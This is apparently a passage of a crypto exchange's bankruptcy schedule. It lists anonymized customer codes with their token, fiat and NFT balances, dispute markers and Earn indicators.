| 07322868 | | BRZ[0], DOGE[0], LINK[0], SUSHI[0], USD[0.00] | | |
| 07322869 | | USD[10.00] | | |
| 07322871 | | BRZ[2], CUSDT[505.97889416], DOGE[2.59845036], GRT[1], USD[0.00] | Yes | |
| 07322872 | | BTC[0], DOGE[0], ETH[0], USD[0.00], USDT[0.00000001] | | |
| 07322873 | | USD[10.00] | | |
| 07322874 | | GRT[1.95057035], SUSHI[.51916564], USD[0.00] | | |
| 07322875 | | CUSDT[7], DOGE[464.23441114], TRX[1], USD[0.00] | Yes | |
| 07322876 | | DOGE[2], SUSHI[0], USD[0.00] | | |
| 07322878 | | USD[10.00] | | |
| 07322879 | | DOGE[1], LINK[0.00190663], SOL[0], USD[0.00] | Yes | |
| 07322883 | | CUSDT[2], DOGE[3013.27105981], TRX[529.6476272], USD[0.00] | Yes | |
| 07322884 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07322885 | | USD[10.00] | | |
| 07322886 | | USD[10.00] | | |
| 07322888 | | BTC[.0001998], DOGE[.00865394], USD[0.91] | | |
| 07322890 | | CUSDT[1], USD[10.98] | Yes | |
| 07322891 | | BTC[.00004558], CUSDT[3], DOGE[21.65195632], ETH[.05902408], ETHW[.05902408], TRX[1], USD[0.40] | | |
| 07322892 | | SOL[.13739426], USD[2.50] | | |
| 07322894 | | DOGE[0], LINK[0], USD[49.58] | | |
| 07322895 | | BRZ[1], CUSDT[2], DOGE[138.93649951], USD[0.00], USDT[0] | | |
| 07322896 | | SOL[1.01177484], USD[0.00] | | |
| 07322897 | | BRZ[2], CUSDT[6], DOGE[1], USD[0.34] | Yes | |
| 07322898 | | USD[10.00] | | |
| 07322899 | | USD[0.00] | | |
| 07322900 | | USD[10.00] | | |
| 07322901 | | BTC[0], USD[0.06] | | |
| 07322902 | | USD[10.00] | | |
| 07322903 | | SOL[0.85674262], USD[0.00] | | |
| 07322905 | | USD[10.00] | | |
| 07322907 | | USD[10.00] | | |
| 07322908 | | DOGE[103.02721803], TRX[1], USD[0.00] | | |
| 07322909 | | BRZ[0], USD[0.00], USDT[0] | | |
| 07322911 | | CUSDT[1], DOGE[365.77854919], TRX[2], USD[0.00] | | |
| 07322912 | | BTC[.00215272], CUSDT[10], DOGE[158.70260156], SHIB[1], TRX[175.45147752], USD[0.00] | Yes | |
| 07322913 | | USD[10.00] | | |
| 07322916 | | DOGE[.858], USD[0.94] | | |
| 07322917 | | USD[20.00] | | |
| 07322919 | | BTC[0], USD[0.00], USDT[0] | | |
| 07322920 | | USD[10.00] | | |
| 07322921 | | USD[10.00] | | |
| 07322922 | | UNI[1.15633176], USD[15.82] | | |
| 07322925 | | USD[11.04] | Yes | |
| 07322927 | | USD[10.00] | | |
| 07322929 | | DOGE[3], USD[0.01] | | |
| 07322931 | | BTC[0.00000968], DOGE[.834], USD[2.01] | | |
| 07322932 | | USD[0.00] | | |
| 07322936 | | BAT[0], BF_POINT[100], DOGE[189.88377542], LTC[0], NFT (390929058767313730/APEFUEL by Almond Breeze #514)[1], NFT (398929077343503110/APEFUEL by Almond Breeze #582)[1], NFT (562262562496008598/APEFUEL by Almond Breeze #756)[1], SHIB[0], SOL[0], USD[-10.00], USDT[0] | Yes | |
| 07322938 | | BRZ[0], DOGE[.0489504], USD[0.00] | Yes | |
| 07322939 | | USD[10.00] | | |
| 07322941 | | DOGE[.14935469], USD[0.02], USDT[1.51253678] | | |
| 07322943 | | BTC[0], DOGE[0], TRX[0.54111414], USD[0.00] | | |
| 07322947 | | TRX[.000001], USD[0.00], USDT[0] | Yes | |
| 07322948 | | USD[10.00] | | |
| 07322949 | | DOGE[.007], USD[0.00] | | |
| 07322950 | | USD[10.00] | | |
| 07322951 | | CUSDT[2], DOGE[1], USD[0.01] | | |
| 07322952 | | USD[0.00] | | |
| 07322955 | | USD[10.00] | | |
| 07322956 | | USD[10.00] | | |
| 07322957 | | USD[0.01] | | |
| 07322958 | | USD[10.00] | | |
| 07322959 | | BRZ[1], CUSDT[2], DOGE[2], USD[0.00] | | |
| 07322962 | | BRZ[1], BTC[.00221209], CUSDT[15], ETH[0], ETHW[0], SHIB[2], SUSHI[.03315472], USD[85.74] | Yes | |
| 07322964 | | BTC[0], DOGE[3.16880564], ETH[0], ETHW[0], NFT (550592651276411361/Ohio Stadium)[1], SHIB[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07322965 | | USD[10.92] | Yes | |
| 07322966 | | DOGE[.85171201], GBP[16.93], GRT[25.39743687], SOL[2.9515333], TRX[330.69412561], USD[0.01] | | |
| 07322967 | | DOGE[.06052427], USD[0.01] | | |
| 07322971 | | BTC[.00260521], DOGE[.00470848], ETH[.03734634], ETHW[.03734634], MATIC[14.86504361], SHIB[1], USD[0.00] | | |
| 07322972 | | BTC[0.00003785], DOGE[.3293854], ETH[0], ETHW[0], USD[0.94], USDT[0] | | |
| 07322973 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07322974 | | USD[10.00] | | |
| 07322975 | | DOGE[141.04034176], USD[0.00] | | |
| 07322978 | | DOGE[122.38136014], USD[0.00] | | |
| 07322979 | | DOGE[1], USD[0.00] | | |
| 07322980 | | BTC[0], USD[0.01], USDT[0] | | |
| 07322981 | | BTC[0], DOGE[1.00873676], ETH[0], LTC[0], USD[0.00] | | |
| 07322982 | | CUSDT[5], DOGE[4768.4556], KSHIB[207.47008488], LTC[.05641167], MATIC[10.43388146], SOL[.25900606], TRX[1], USD[0.00] | | |
| 07322983 | | USD[0.00] | | |
| 07322984 | | BTC[0], DOGE[0], SOL[0], USD[0.33] | | |
| 07322985 | | USD[10.00] | | |
| 07322988 | | USD[10.00] | | |
| 07322991 | | CUSDT[1], DOGE[50.85428684], USD[0.00] | Yes | |
| 07322992 | | BRZ[1], BTC[0.00718125], CUSDT[4], DOGE[.03971682], LTC[0], SHIB[1], TRX[4], USD[119.77], USDT[1.09170851] | Yes | |
| 07322993 | | USD[10.00] | | |
| 07322994 | | CUSDT[2], DOGE[30.28481626], TRX[1], USD[0.00] | | |
| 07322995 | | BRZ[1], CUSDT[1], DOGE[5], USD[0.00] | | |
| 07322996 | | CUSDT[1], DOGE[9015.68822534], TRX[1], USD[0.00] | | |
| 07322998 | | USD[10.00] | | |
| 07323000 | | USD[0.00] | | |
| 07323001 | | SHIB[438036.32067468], USD[0.00] | Yes | |
| 07323002 | | DOGE[2], USD[0.00] | Yes | |
| 07323004 | | CUSDT[1], USD[0.00] | | |
| 07323005 | | SOL[0], USD[2.05] | | |
| 07323009 | | USD[10.00] | | |
| 07323010 | | USD[10.00] | | |
| 07323011 | | BAT[26.62431889], CUSDT[19], DOGE[4038.44639279], ETH[.01560455], ETHW[.01541303], GRT[567.69006749], MATIC[107.56511707], MKR[.0122218], NFT (344138320756402459/Another World #1)[1], SHIB[1252881.04251273], SOL[1.10685408], SUSHI[2.21131911], TRX[174.45351077], UNI[2.16019873], USD[70.44], USDT[10.91334709] | Yes | |
| 07323012 | | BRZ[1], CUSDT[12], TRX[4], USD[0.00] | | |
| 07323013 | | DOGE[2], GRT[3.73660595], USD[0.05] | | |
| 07323014 | | USD[10.21] | Yes | |
| 07323015 | | USD[10.00] | | |
| 07323016 | | ETH[.00000001], ETHW[0] | | |
| 07323020 | | USD[0.00] | | |
| 07323022 | | BAT[9.98177751], BRZ[2], BTC[0], CUSDT[11], GRT[5.33543753], LINK[2.22118677], TRX[21.08642135], UNI[3.33178013], USD[0.01], USDT[4.43995202] | Yes | |
| 07323023 | | ETH[.00569377], ETHW[.00569377], USD[0.00] | | |
| 07323025 | | USD[10.00] | | |
| 07323026 | | USD[20.00] | | |
| 07323027 | | USD[10.00] | | |
| 07323029 | | BRZ[1], CAD[0.00], CUSDT[18], DOGE[0], SUSHI[.73753051], TRX[1], USD[0.00] | | |
| 07323031 | | USD[10.00] | | |
| 07323032 | | USD[10.00] | | |
| 07323033 | | USD[0.01] | | |
| 07323036 | | USD[0.31] | Yes | |
| 07323037 | | USD[0.00] | | |
| 07323038 | | USD[10.00] | | |
| 07323041 | | CUSDT[2], DOGE[2054.06400903], TRX[1], USD[0.00] | | |
| 07323042 | | USD[10.00] | | |
| 07323043 | | USD[10.00] | | |
| 07323045 | | USD[10.00] | | |
| 07323046 | | BTC[0], DOGE[0] | | |
| 07323047 | | USD[10.00] | | |
| 07323050 | | GRT[344.36020763], USD[0.00] | | |
| 07323053 | | BTC[0], DOGE[0], ETH[0], LINK[0], LTC[0], USD[0.00] | | |
| 07323057 | | BTC[.00020805], USD[10.00] | | |
| 07323059 | | CUSDT[7], DOGE[1166.01351875], SUSHI[5.33025355], TRX[151.02751864], USD[15.99] | Yes | |
| 07323060 | | USD[10.00] | | |
| 07323061 | | USD[10.00] | | |
| 07323063 | | CUSDT[3435.19947296], DOGE[2362.83439182], TRX[1501.45129303], USD[0.01] | Yes | |
| 07323064 | | BAT[1], CUSDT[2], DOGE[106.94525459], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07323065 | | CUSDT[2], TRX[3], USD[0.00] | Yes | |
| 07323066 | | DOGE[175.81196558], USD[10.00] | | |
| 07323068 | | USD[10.00] | | |
| 07323071 | | DOGE[1], USD[0.00] | | |
| 07323072 | | USD[10.00] | | |
| 07323073 | | BRZ[0.00000003], BTC[0], CUSDT[2], DOGE[0], ETH[0], GRT[0], SUSHI[0], USD[0.00] | | |
| 07323076 | | BAT[2.08062521], BRZ[5.07952967], CUSDT[4], DOGE[6.14417397], SHIB[50.52510567], TRX[.20167392], USD[1.41], USDT[2.1966871] | Yes | |
| 07323077 | | CUSDT[.00001915], DOGE[111.73928368], TRX[2], USD[0.00] | | |
| 07323078 | | USD[10.00] | | |
| 07323079 | | USD[0.19], USDT[0] | Yes | |
| 07323080 | | CUSDT[2], DOGE[0], TRX[0.00003462], USD[0.00] | | |
| 07323081 | | CUSDT[1], DOGE[0], ETH[0], USD[0.44], USDT[1] | | |
| 07323084 | | BTC[.0001975], USD[10.00] | | |
| 07323085 | | BAT[2], BRZ[4], CUSDT[14], DOGE[0], GRT[1], SHIB[18700.48771507], TRX[10], USD[0.00], USDT[0] | | |
| 07323087 | | BTC[0], DOGE[1], GRT[5.05849436], TRX[1], USD[0.00] | Yes | |
| 07323088 | | USD[10.00] | | |
| 07323089 | | BTC[.00008248], SHIB[25.36583367], USD[0.00] | Yes | |
| 07323091 | | USD[0.39] | | |
| 07323093 | | BAT[.19742253], BTC[0], USD[0.00] | | |
| 07323094 | | CUSDT[1], DOGE[15.85625798], TRX[1], USD[0.00] | | |
| 07323095 | | CUSDT[2], DOGE[0], SHIB[1], TRX[1], USD[0.01] | Yes | |
| 07323096 | | CUSDT[1], GRT[0], LINK[.00004447], TRX[3], USD[0.00] | | |
| 07323097 | | CUSDT[1], DOGE[.08460287], ETH[.01406377], ETHW[.01406377], SUSHI[.62177631], USD[-1.06] | | |
| 07323098 | | USD[10.00] | | |
| 07323101 | | DOGE[0], ETH[0], USD[0.65] | | |
| 07323103 | | DOGE[34.17273707], USD[0.00], USDT[0] | | |
| 07323104 | | TRX[1], USD[0.00] | | |
| 07323106 | | CUSDT[7], DOGE[46.01670104], TRX[1], USD[0.00] | | |
| 07323107 | | ETH[.00609893], ETHW[.0060178], USD[0.00] | Yes | |
| 07323109 | | USD[10.00] | | |
| 07323111 | | BTC[.0008964], USD[0.55] | | |
| 07323112 | | BTC[.00016234], TRX[1], USD[0.00] | Yes | |
| 07323113 | | DOGE[20.99088335], USD[0.00] | | |
| 07323114 | | CUSDT[2], DOGE[190.76427917], USD[0.00] | Yes | |
| 07323115 | | CUSDT[4], USD[0.01] | | |
| 07323117 | | USD[10.00] | | |
| 07323118 | Contingent, Disputed | BTC[.00000001], DOGE[241.37637298], SHIB[2], USD[0.00], USDT[0] | Yes | |
| 07323122 | | CUSDT[3], DOGE[1], ETH[.07302901], ETHW[.07302901], USD[0.00], USDT[1] | | |
| 07323125 | | USD[0.00] | | |
| 07323126 | | BTC[0.04453116], CUSDT[2], DOGE[3159.69673971], GRT[.04181733], SOL[1.09529354], SUSHI[.74699373], TRX[1], USD[0.00] | Yes | |
| 07323128 | | USD[10.00] | | |
| 07323129 | | USD[10.00] | | |
| 07323130 | | BRZ[0], DOGE[0], TRX[1], USD[0.01] | | |
| 07323131 | | BRZ[1], CUSDT[8], DOGE[2], TRX[4], USD[0.00], USDT[0] | | |
| 07323132 | | CUSDT[4], ETH[.00564441], ETHW[.00564441], GRT[1], TRX[3], USD[0.01], USDT[1] | | |
| 07323133 | | CUSDT[2], DOGE[1], USD[0.00], USDT[0] | | |
| 07323136 | | MATIC[8.86263634], USD[0.00] | | |
| 07323137 | | SOL[.05316705], USD[0.00] | | |
| 07323138 | | BF_POINT[200], BRZ[1], CUSDT[15], TRX[2], USD[0.00] | Yes | |
| 07323139 | | USD[10.00] | | |
| 07323141 | | BRZ[1], CUSDT[1], DOGE[162.66425251], USD[0.01] | | |
| 07323142 | | USD[11.07] | Yes | |
| 07323143 | | CUSDT[1], USD[0.01] | | |
| 07323144 | | BAT[2.07753627], BRZ[1], CUSDT[9], SHIB[1], SUSHI[5.79179601], TRX[1], USD[0.91] | Yes | |
| 07323148 | | USD[10.00] | | |
| 07323150 | | CUSDT[1], DOGE[363.79586497], USD[10.00] | | |
| 07323152 | | USD[0.02], USDT[0] | Yes | |
| 07323153 | | BF_POINT[200], DOGE[0], SOL[.00002455], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07323154 | | USD[10.00] | | |
| 07323155 | | USD[10.00] | | |
| 07323157 | | USD[10.00] | | |
| 07323159 | | USD[10.00] | | |
| 07323160 | | USD[10.00] | | |
| 07323161 | | USD[10.88] | Yes | |
| 07323162 | | BTC[.00125798], DOGE[495.00678014], ETH[.02177583], ETHW[.02150223], LTC[.07165085], USD[0.00] | Yes | |
| 07323163 | | BTC[0], DOGE[0], ETH[0], SOL[0], SUSHI[0], USD[0.00], YFI[0] | | |
| 07323164 | | BAT[0], CUSDT[2], DOGE[104.57627182], SHIB[0], SUSHI[0], USD[0.00] | Yes | |
| 07323167 | | USD[10.00] | | |
| 07323168 | | BAT[0], BCH[0], BRZ[0], DOGE[0], GRT[0], LTC[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07323169 | | BRZ[1], NFT (47549663586720719 7/Space Bums #6529)[1], NFT (47929287574676925 3/FTX - Off The Grid Miami #4090)[1], SOL[1.99620744], USD[0.01] | | |
| 07323170 | | CUSDT[1], MATIC[1.78368864], USD[0.00] | | |
| 07323171 | | LINK[.37942552], TRX[1], USD[0.01] | | |
| 07323176 | | BAT[0], BRZ[1], CUSDT[11], DOGE[0], SOL[0], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07323178 | | USD[10.00] | | |
| 07323179 | | AVAX[313.23838579], BAT[3.10963438], CUSDT[1], DOGE[3], ETH[1.85592495], ETHW[1.85335007], GRT[4.0620893], LINK[2.10229178], MATIC[1.01317787], SHIB[1], SOL[762.07825638], SUSHI[1.0471697], TRX[5], UNI[2.09726845], USD[0.00], USDT[3.11636968] | Yes | |
| 07323180 | | BAT[0], BRZ[2], BTC[0], CUSDT[6], ETH[0], ETHW[22.82195091], GRT[3.12044052], SOL[0], TRX[16.75689633], USD[0.00] | Yes | |
| 07323184 | | USD[10.00] | | |
| 07323185 | | ETH[0], SOL[94.48703110], TRX[0.12873253], USD[0.00], USDT[0.00000153] | Yes | |
| 07323187 | | CUSDT[1], DOGE[3209.45385468], TRX[2], USD[0.78] | | |
| 07323193 | | TRX[198.76602078], USD[0.00] | | |
| 07323194 | | BAT[0], BTC[0], DOGE[0], USD[0.60] | | |
| 07323195 | | DOGE[137.22755869], USD[0.00] | | |
| 07323196 | | USD[10.00] | | |
| 07323201 | | USD[0.00] | | |
| 07323202 | | CUSDT[1], DOGE[3], ETH[.75143999], ETHW[.75143999], GRT[1], USD[0.00] | | |
| 07323204 | | BRZ[1], CUSDT[1], DOGE[764.74853532], TRX[2], USD[47.94] | | |
| 07323205 | | USD[10.00] | | |
| 07323206 | | BAT[22.18747318], CUSDT[2], DOGE[1.34673485], USD[151.29] | | |
| 07323207 | | ETH[.000252], ETHW[.000252], USD[5.99], USDT[0.00660000] | | |
| 07323211 | | USD[10.00] | | |
| 07323213 | | USD[10.00] | | |
| 07323214 | | BRZ[1], BTC[.00061432], CUSDT[3], DOGE[1735.294057], ETH[.2688971], ETHW[.2688971], LINK[4.05208641], TRX[4368.33991431], USD[0.00] | | |
| 07323221 | | BTC[0], DOGE[0], SOL[0], USD[0.00] | | |
| 07323226 | | USD[10.00] | | |
| 07323227 | | USD[10.00] | | |
| 07323228 | | USD[10.00] | | |
| 07323229 | | USD[10.00] | | |
| 07323230 | | USD[10.00] | | |
| 07323244 | | BAT[0], BTC[0], DAI[0], DOGE[0.00181199], ETH[0], LINK[0], LTC[0], SOL[0.00000067], SUSHI[0], TRX[0], UNI[0], USD[65.03] | | |
| 07323246 | | UNI[.0783], USD[0.04] | | |
| 07323256 | | BTC[0.00003512], ETH[.00051505], ETHW[.00051505], GRT[.5896], LINK[.05858], LTC[.239088], SOL[.0034], USD[1745.52], USDT[0] | | |
| 07323260 | | DOGE[117.14438176], SUSHI[0], USD[0.07] | | |
| 07323261 | | BTC[0], ETH[0], LINK[0], SOL[0], USD[0.10] | | |
| 07323269 | | DOGE[.856], LINK[.054], USD[0.02] | | |
| 07323275 | | SOL[6.6], USD[0.11] | | |
| 07323277 | | BTC[0], LTC[.009], SOL[0.06108823], SUSHI[0.27528838], TRX[.792], USD[3.10], USDT[.5090279] | | |
| 07323283 | | BTC[.06317899], USD[0.00] | | |
| 07323287 | | USD[0.00] | | |
| 07323288 | | CUSDT[2], DOGE[1], LTC[.00218235], USD[0.01] | | |
| 07323289 | | BRZ[0], BTC[0], CUSDT[3], DOGE[0], ETH[0], GRT[0], LINK[0], SUSHI[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07323290 | | USD[10.00] | | |
| 07323291 | | USD[10.00] | | |
| 07323292 | | USD[10.00] | | |
| 07323293 | | BTC[0], CUSDT[6], DOGE[0], ETH[0], TRX[2], USD[0.00] | | |
| 07323294 | | BAT[1.0159912], CUSDT[1], DOGE[1], ETH[1.62448025], ETHW[1.62378321], TRX[1], UNI[1.0879111], USD[0.62] | Yes | |
| 07323296 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07323297 | | BRZ[1], CUSDT[1], DOGE[2], NFT (350110419234414390/FTX - Off The Grid Miami #1889)[1], TRX[1], USD[0.00] | | |
| 07323298 | | USD[10.00] | | |
| 07323299 | | DOGE[1], USD[0.01] | | |
| 07323301 | | USD[10.00] | | |
| 07323302 | | USD[10.00] | | |
| 07323305 | Contingent, Disputed | USD[10.00] | | |
| 07323306 | | CUSDT[1], USD[0.00] | Yes | |
| 07323307 | | BTC[0], CUSDT[2], DOGE[1], USD[4.81] | Yes | |
| 07323308 | | USD[0.66] | Yes | |
| 07323309 | | SHIB[20900000], USD[6.81] | | |
| 07323310 | | USD[10.00] | | |
| 07323311 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07323312 | | TRX[1], USD[0.01] | | |
| 07323313 | | USD[10.00] | | |
| 07323314 | | CUSDT[2], DOGE[40.61649199], SHIB[2], TRX[153.2779541], USD[0.00], USDT[1] | | |
| 07323315 | | CUSDT[4], DOGE[300.41246078], SHIB[1350950.19240645], TRX[1], USD[0.00] | | |
| 07323317 | | GRT[5.81787696], USD[0.00] | | |
| 07323318 | | CUSDT[1], GRT[1], USD[0.00], USDT[0] | | |
| 07323319 | | USD[10.00] | | |
| 07323321 | | DOGE[28.06653565], USD[0.00] | | |
| 07323322 | | CUSDT[1], DOGE[842.91504249], USD[0.00], USDT[0] | Yes | |
| 07323323 | | BAT[1], BRZ[2], CUSDT[14], DOGE[190.19783606], ETH[.00000011], ETHW[.00000011], SHIB[2], TRX[5.61275241], USD[0.00] | Yes | |
| 07323325 | | CUSDT[2], DOGE[1], TRX[2], USD[0.01] | | |
| 07323326 | | BRZ[1], LINK[104.75], SUSHI[32.43980595], USD[10.00] | | |
| 07323327 | | BAT[1.0165555], BRZ[7.7691148], BTC[.04477736], CUSDT[9], GRT[3.19264404], LINK[99.9678802], SHIB[2.00175361], SUSHI[1.10962013], TRX[1], UNI[1.10987347], USD[0.00], USDT[4.43949411] | Yes | |
| 07323328 | | USD[10.00] | | |
| 07323329 | | BAT[1.0165555], BRZ[4], BTC[0], CUSDT[16], DOGE[4.00731258], ETH[0], LINK[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07323330 | | BRZ[1], CUSDT[5], DOGE[13.00563502], TRX[2], USD[0.00] | | |
| 07323331 | | USD[10.00] | | |
| 07323332 | | BRZ[1], CUSDT[11], DOGE[.02093207], TRX[2], USD[2.01] | | |
| 07323334 | | USD[0.00] | | |
| 07323335 | | DOGE[.00161342], USD[0.69], USDT[0] | Yes | |
| 07323336 | | CUSDT[2], TRX[2], USD[1.11], USDT[0] | Yes | |
| 07323337 | | USD[10.00] | | |
| 07323339 | | DOGE[7472.06179184], USD[10.00] | | |
| 07323340 | | DOGE[2108.1628257], USD[0.00] | | |
| 07323341 | | DOGE[1601.81147104], USD[0.00] | Yes | |
| 07323342 | | BCH[1.05696228], BRZ[3], CUSDT[13], DOGE[2124.60268367], ETH[.20577986], ETHW[.20577986], LTC[.87961547], SHIB[8786559.95787635], TRX[3], USD[0.15] | | |
| 07323343 | | BRZ[1], CUSDT[2], ETHW[.52998161], SHIB[1], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07323344 | | BRZ[1], CUSDT[1], DOGE[1.00003295], TRX[1], USD[0.01] | | |
| 07323345 | | DOGE[135.44829525], USD[0.00] | | |
| 07323347 | | USD[0.01] | Yes | |
| 07323348 | | USD[0.00] | | |
| 07323349 | | BAT[1], BRZ[2], BTC[.21692991], DOGE[8085.90319112], TRX[1], USD[10.00] | | |
| 07323351 | | USD[10.56] | Yes | |
| 07323352 | | USD[10.00] | | |
| 07323353 | | USD[0.00] | Yes | |
| 07323354 | | USD[10.00] | | |
| 07323355 | | DOGE[1.14414948], USD[0.00] | | |
| 07323356 | | USD[10.00] | | |
| 07323358 | | USD[10.00] | | |
| 07323359 | | CUSDT[4], DOGE[133.30750056], ETH[.00559884], ETHW[.00559884], TRX[88.37766013], USD[8.85] | | |
| 07323361 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07323362 | | USD[22.17] | Yes | |
| 07323363 | | USD[0.00] | | |
| 07323364 | | USD[10.91] | Yes | |
| 07323365 | | BCH[0], BRZ[1], BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], MATIC[0], SHIB[35], SOL[0], TRX[0], USD[0.53] | Yes | |
| 07323366 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07323368 | | DOGE[134.36982634], USD[0.00] | | |
| 07323369 | | USD[10.00] | | |
| 07323370 | | DOGE[.00069405], TRX[1], USD[124.05] | | |
| 07323371 | | USD[10.00] | | |
| 07323372 | | USD[10.00] | | |
| 07323373 | | USD[10.00] | | |
| 07323374 | | USD[10.00] | | |
| 07323378 | | CUSDT[1], MATIC[8.4582605], USD[0.00] | | |
| 07323379 | | CUSDT[2], DOGE[.02222909], TRX[2], USD[0.84] | | |
| 07323380 | | USD[10.00] | | |
| 07323384 | | USD[10.00] | | |
| 07323385 | | DOGE[262.20445613], TRX[1], USD[0.00] | Yes | |
| 07323386 | | USD[10.00] | | |
| 07323387 | | USD[0.01] | Yes | |
| 07323388 | | BAT[1], CUSDT[2], USD[0.00], USDT[1] | | |
| 07323389 | | BRZ[1], DOGE[.00085419], GRT[31.68741284], USD[0.00] | | |
| 07323390 | | BAT[1.01615646], BRZ[2], CUSDT[2], DOGE[1], GRT[3.12326911], LINK[.00036578], SHIB[1], SOL[34.74023725], TRX[4], USD[0.00] | Yes | |
| 07323391 | | USD[10.00] | | |
| 07323392 | | BAT[41.26979465], CUSDT[2], DOGE[672.87441413], TRX[1], USD[0.00] | | |
| 07323393 | | BRZ[1], CUSDT[1], DOGE[.1617133], TRX[3], USD[0.01], USDT[1] | | |
| 07323394 | | USD[10.00] | | |
| 07323395 | | BRZ[0], USD[0.00] | | |
| 07323397 | | USD[10.00] | | |
| 07323398 | | USD[0.00] | | |
| 07323399 | | DOGE[0] | | |
| 07323400 | | BTC[.0001481], DOGE[96.25651594], USD[16.21] | | |
| 07323401 | | CUSDT[1], DOGE[136.56983819], USD[0.00] | | |
| 07323402 | | BTC[.00109865], DOGE[0], KSHIB[.00003055], TRX[0], USD[0.00], USDT[0] | | |
| 07323403 | | BAT[0.19436783], TRX[0], USD[3.58] | | |
| 07323404 | | USD[0.00], USDT[0.00000001] | | |
| 07323405 | | USD[10.00] | | |
| 07323407 | | BTC[.00021672], USD[0.00] | Yes | |
| 07323409 | | BRZ[0.00009122], CUSDT[5], DOGE[0.00596500], ETH[0], LINK[0], TRX[.000003], USD[0.62] | | |
| 07323411 | | DAI[0], ETH[0], USD[0.01], USDT[0] | | |
| 07323412 | | USD[10.00] | | |
| 07323413 | | USD[10.00] | | |
| 07323414 | | USD[10.00] | | |
| 07323415 | | SUSHI[.59189301], USD[0.00] | | |
| 07323416 | | USD[10.00] | | |
| 07323417 | | DOGE[12577.41], USD[0.18] | | |
| 07323419 | | USD[11.01] | Yes | |
| 07323421 | | USD[10.00] | | |
| 07323423 | | CUSDT[2], DOGE[84.88791533], MATIC[23.51414527], SOL[2.15941037], TRX[216.90507949], UNI[2.07420374], USD[116.22] | | |
| 07323425 | | BRZ[1], CUSDT[4], DOGE[.81906347], USD[0.02] | | |
| 07323426 | | BRZ[1], BTC[.0021867], CUSDT[6], USD[0.01] | | |
| 07323427 | | BAT[0], BRZ[0], BTC[0], DOGE[1], GRT[0], TRX[0], USD[0.00] | | |
| 07323430 | | USD[10.00] | | |
| 07323431 | | BTC[.00021224], CUSDT[1], DOGE[0], ETH[0.01454082], ETHW[0.01436298], GRT[0], LTC[0], SUSHI[1.26338535], TRX[1], UNI[6.34540807], USD[0.00] | Yes | |
| 07323432 | | USD[10.00] | | |
| 07323433 | | BRZ[1], BTC[.00548444], DOGE[994.77523384], ETH[.36731622], ETHW[.36731622], TRX[1], USD[0.00] | | |
| 07323435 | | USD[10.00] | | |
| 07323436 | | USD[10.00] | | |
| 07323440 | | USD[0.00] | | |
| 07323441 | | USD[10.00] | | |
| 07323442 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[1.10577012], ETH[0], ETHW[0], USD[0.00] | Yes | |
| 07323443 | | BRZ[1], CUSDT[1], DOGE[1], LINK[0], TRX[1], USD[0.00], USDT[1] | | |
| 07323445 | | USD[10.00] | | |
| 07323446 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07323447 | | USD[10.00] | | |
| 07323450 | | DOGE[120.81006495], USD[0.00] | | |
| 07323451 | | USD[0.01] | | |
| 07323452 | | BRZ[2], CUSDT[475.70171245], DOGE[2], ETHW[.25], GRT[1], TRX[1], USD[4.13] | | |
| 07323453 | | CUSDT[1], ETHW[1.1132268], TRX[.00000081], USD[0.03] | Yes | |
| 07323454 | | USD[10.00] | | |
| 07323456 | | DOGE[1], ETH[.69037486], ETHW[.69037486], USD[0.00] | | |
| 07323457 | | BAT[2.08408966], BRZ[2], CUSDT[1], DOGE[0], GRT[1.00319994], SHIB[2], TRX[3], USD[0.01] | Yes | |
| 07323458 | | BTC[.00028837], DOGE[185.22105507], USD[0.00] | Yes | |
| 07323459 | | BCH[.09366781], BTC[.0026536], CUSDT[2], DOGE[8114.0921769], ETH[.02827397], ETHW[.02827397], GRT[18.92381978], TRX[282.84295787], USD[0.32] | | |
| 07323460 | | USD[10.00] | | |
| 07323461 | | BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], SGD[0.00], USDT[0], YFI[0] | | |
| 07323462 | Contingent, Disputed | USD[10.00] | | |
| 07323463 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], MATIC[3130.94713414], NFT (51882139616423125?/Entrance Voucher #2249)[1], SHIB[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[2154.34], USDT[0], YFI[0] | Yes | |
| 07323464 | | CUSDT[1], USD[0.00] | Yes | |
| 07323465 | | DOGE[1.00003105], TRX[1], USD[0.01] | | |
| 07323466 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07323467 | | USD[10.00] | | |
| 07323468 | | CUSDT[3], DOGE[159.61414884], ETH[0.02705894], ETHW[0.02705894], GRT[0], TRX[1], UNI[0], USD[0.00] | | |
